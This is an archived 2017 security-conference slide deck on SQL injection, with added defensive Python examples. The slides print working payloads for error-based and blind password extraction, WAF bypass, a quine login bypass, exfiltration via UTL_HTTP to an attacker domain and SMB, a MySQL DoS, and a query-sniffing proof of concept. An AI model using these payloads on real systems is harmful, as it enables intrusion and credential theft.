Source: secuinside.com/archive/2017/2017-1-2.pdf (SECUINSIDE 2017 slide deck, archived 2017-08-19)
Look at What They Dismiss as "Just Web Hacking" (웹해킹이라고 무시하는 것들 보소)
2017.07.10
RUBIYA805[AT]GMAIL[DOT]COM
SQL Injection: The Threat That Isn't Over
Who am I
• 정도원 aka rubiya
• Penetration tester
• Web application bug hunter
• Pwned 20+ wargames
• @kr_rubiya
• Jobless
• How to find vulnerability?
• How to exploit vulnerability?
• Exploit more smartly
• MITM SQL Injection
What is SQL Injection
SELECT * FROM users WHERE name = '" + userName + "';
SELECT * FROM users WHERE name = 'FooBar';
SELECT * FROM users WHERE name = '1' OR '1'='1';
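The slide's concatenated query beside its parameterized form, as an added example in Python with SQLite (not code from the talk); the users table and its rows are constructed.

```python
import sqlite3

# Constructed sample rows (not from the slides).
SAMPLE_USERS = [
    ("alice", "alice@example.test"),
    ("bob", "bob@example.test"),
    ("carol", "carol@example.test"),
]


def build_db() -> sqlite3.Connection:
    """In-memory users table populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_unsafe(conn, user_name: str) -> list:
    """The slide's pattern: user input spliced into the SQL text.
    A quote in the input closes the literal and the rest becomes SQL,
    so "1' OR '1'='1" turns the WHERE clause into a tautology."""
    sql = "SELECT name FROM users WHERE name = '" + user_name + "'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_safe(conn, user_name: str) -> list:
    """Same query with a bound parameter: the driver passes the value
    separately from the SQL text, so a quote is just a character."""
    sql = "SELECT name FROM users WHERE name = ?"
    return sorted(row[0] for row in conn.execute(sql, (user_name,)))


if __name__ == "__main__":
    db = build_db()
    print(lookup_unsafe(db, "FooBar"))         # []
    print(lookup_unsafe(db, "1' OR '1'='1"))   # ['alice', 'bob', 'carol']
    print(lookup_safe(db, "1' OR '1'='1"))     # []
```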
Easy to access
NT Web Technology Vulnerabilities
But…
Why hard to prevent
How to find sqli vuln?
How about AEG?
How to find sqli vuln?
Indirect SQL Injection
Web Application Firewall
• An attack-blocking solution developed to protect web applications
• Pattern-based firewall
• Pattern = ' or '1'='1
  ' and '1'='1
  ' || '1'='1
• Incoming: ' or '2'='2 (not in the list, so it goes through; the pattern is then added)
• Pattern = ' or '1'='1
  ' and '1'='1
  ' || '1'='1
  ' or '2'='2
• Incoming: ' or '3'='3 (not in the list either)
Web Application Firewall
• In ASP, when a %-escape falls outside the %[00-FF] range, the % itself is ignored
?id='UN%ION SE%LECT 1--;
↓
?id='UNION SELECT 1--;
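A detection sketch added here (not from the talk) covering both WAF points above: canonicalize the request the way the backend will before matching, and replace the enumerated '1'='1, '2'='2, ... literals with one backreference rule. The ASP decoding model is an assumption drawn from the slide's description, not a verified reimplementation of ASP.

```python
import re
import string


def asp_like_decode(raw: str) -> str:
    """Model of the decoding the slide describes: a % that starts a valid
    %XX escape (00-FF) is decoded, a % that does not is dropped.
    Assumption taken from the slide, not verified against a specific ASP build."""
    out = []
    i = 0
    while i < len(raw):
        if raw[i] == "%":
            hex_part = raw[i + 1:i + 3]
            if len(hex_part) == 2 and all(c in string.hexdigits for c in hex_part):
                out.append(chr(int(hex_part, 16)))
                i += 3
                continue
            i += 1  # stray %: the backend ignores it, so the detector must too
            continue
        out.append(raw[i])
        i += 1
    return "".join(out)


# Two rules. "union-select" is a plain keyword rule; "tautology" matches any
# 'X'='X comparison via a backreference instead of listing '1'='1, '2'='2, ...
RULES = {
    "union-select": re.compile(r"\bunion\b\s+\bselect\b", re.IGNORECASE),
    "tautology": re.compile(r"'\s*(?:or|and|\|\|)\s*'([^']*)'\s*=\s*'\1", re.IGNORECASE),
}


def flag_raw(raw: str) -> list:
    """Rules applied to the request as received (the form the slide bypasses)."""
    return [name for name, rule in RULES.items() if rule.search(raw)]


def flag_normalized(raw: str) -> list:
    """Rules applied after canonicalizing the input the way the backend will."""
    return flag_raw(asp_like_decode(raw))


if __name__ == "__main__":
    for sample in ["' or '3'='3", "'UN%ION SE%LECT 1--;", "FooBar"]:
        print(repr(sample), flag_raw(sample), flag_normalized(sample))
```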
SQL Injection + DDOS?
How to exploit vulnerability?
• Classic SQL Injection
• Blind SQL Injection
• Error Based SQL Injection
• Error Based Blind SQL Injection
• Time Based Blind SQL Injection
Error Based SQL Injection
• Possible when error messages are displayed to the client
• A technique that makes the wanted value appear inside the error message
• The attack method differs per DBMS
Error Based SQL Injection - MSSQL
Error Based SQL Injection - MySQL
• Duplicate entry
'||1 group by mid(version(),rand())having min(1)#
• XPATH syntax error
'|updatexml(0,concat(0xa,version()),0)#
• BIGINT value is out of range in
'--~(select*from(select@@version)f)#
Error Based Blind SQL Injection
• Used when the True/False outcome of the query cannot be observed
• Possible when a raised error is caught by exception handling (an erroring query still behaves differently)
Error Based Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
select(select 96 union select ascii(substr((select pw from users),1,1)))
96,97 returned -> the scalar subquery yields two rows -> error
select(select 97 union select ascii(substr((select pw from users),1,1)))
97 returned -> the union collapses to one row -> no error
Time Based Blind SQL Injection
• MySQL
sleep(), benchmark()
• MSSQL
waitfor delay, waitfor time
• Oracle
dbms_lock.sleep()
Compounded SQL Injection
• SQLi + XSS
• SQLi + Authentication Bypass
• Out Of Band SQLi
SQLi + XSS
• When INSERT or UPDATE is possible, chain into stored XSS
• Browser 1-day attacks delivered through iframe tags have been in fashion
INSERT INTO board(no,user,<script>evilcode</script>)
UPDATE board SET content=<script>evilcode</script>
SQLi + Authentication Bypass
• Union SQL Injection
• Authentication bypass via a recursive return value
Union SQL Injection
• Object Injection
• SSRF
• XML External Entity
• LFI / RFI
Authentication bypass via a recursive return value
s = 's = %r\nprint(s%%s)'
print(s%s)
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
if(queryResult)
if(queryResult == input)
loginSuccess()
?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))--',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--
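The slide's REPLACE quine run for real, beside the check a login should perform instead of the `queryResult == input` comparison shown above; an added example in Python with SQLite, not code from the talk. SQLite's REPLACE/CHAR stand in for MySQL's, and the sample accounts are constructed.

```python
import hashlib
import hmac
import os
import sqlite3

# The slide's quine, rebuilt from its inner template the same way the SQL
# rebuilds itself: swap " for ', then substitute every $ with the template.
TEMPLATE = 'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine'


def build_quine() -> str:
    return TEMPLATE.replace('"', "'").replace("$", TEMPLATE)


def run_scalar(sql: str) -> str:
    """Run one scalar query in SQLite and return its single value."""
    with sqlite3.connect(":memory:") as conn:
        return conn.execute(sql).fetchone()[0]


def is_self_reproducing(sql: str) -> bool:
    """True when the returned row is exactly the query text that produced it.
    This is the property the slide's pseudo-code (queryResult == input) trusts."""
    return run_scalar(sql) == sql


# --- the hardened check (added here, not from the slides) --------------------
# The login decision never compares anything against client input: the row is
# fetched by bound parameter and the password is verified against a salted
# hash entirely on the server side.

def _hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_users_db(accounts: dict) -> sqlite3.Connection:
    """Constructed sample accounts given as {id: password}."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    for user_id, password in accounts.items():
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                     (user_id, salt, _hash_pw(password, salt)))
    return conn


def login_fixed(conn, user_id: str, password: str) -> bool:
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE id = ?",
                       (user_id,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[1], _hash_pw(password, row[0]))


if __name__ == "__main__":
    quine = build_quine()
    print(is_self_reproducing(quine))                     # True
    db = make_users_db({"guest123": "mypass666"})
    print(login_fixed(db, "guest123", "mypass666"))      # True
    print(login_fixed(db, quine, quine))                 # False
```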
Out Of Band SQLi
• Sending packets to an external server
• Accessing files on the internal network
• DoS against the SQL server
• DNS Query
UTL_HTTP.REQUEST('http://'||(select…)||'.mydomain');
• Access SMB file
load_file('\\\\192.168.0.101\\aa');
DoS against the DBMS
• BENCHMARK()
• Heavy Query
• CVE-2015-4870
CVE-2015-4870
select * from information_schema.tables
procedure analyse((select*from(select 1)x),1);
Lord of SQL Injection
Exploit more smartly
• Bitwise operation Blind SQL Injection
• UPDATE, INSERT Blind SQL Injection without modify data
• MITM SQL Injection
Drawbacks of Blind SQL Injection
• Slow.
• Leaves a lot of logs.
Bitwise operation Blind SQL Injection
ascii(substr((select pw from users),1,1))=97
Instead of comparing the whole value, test one bit of it per request:
substr(lpad(bin(ascii(substr((select pw from users),1,1))),8,0),1,1) = 1
→ substr(lpad(bin(97),8,0),1,1) = 1
→ substr(lpad(1100001,8,0),1,1) = 1
→ substr(01100001,1,1) = 1
Since the top bit of an ASCII value is always 0, padding to 7 bits is enough:
substr(lpad(bin(ascii(substr((select pw from users),1,1))),7,0),1,1)
MITM SQL Injection
• Information_schema.processlist.info
Sniff Query?
• Sign-up
insert into users values("guest123",md5("mypass666"))
• Login
select...where id='guest123' and pw=md5('mypass666')
But…
• If sniffing it yourself is too slow, make the DBMS do it!
• BENCHMARK(count,expr)
• @var_name = expr
SELECT benchmark(9999999,
@query:=concat(
@query,(select info from information_schema.processlist)
)
)
Issues
• When the same value is queried repeatedly, the query result gets cached;
  with only SELECT privilege the cache cannot be turned off
• A query that was captured once is then returned countless times
Proof of Concept
SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*MITM_SQLI_PWN*/))^(IF((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0))) UNION SELECT @query limit 3,1
Thank You RUBIYA805[AT]GMAIL[DOT]COM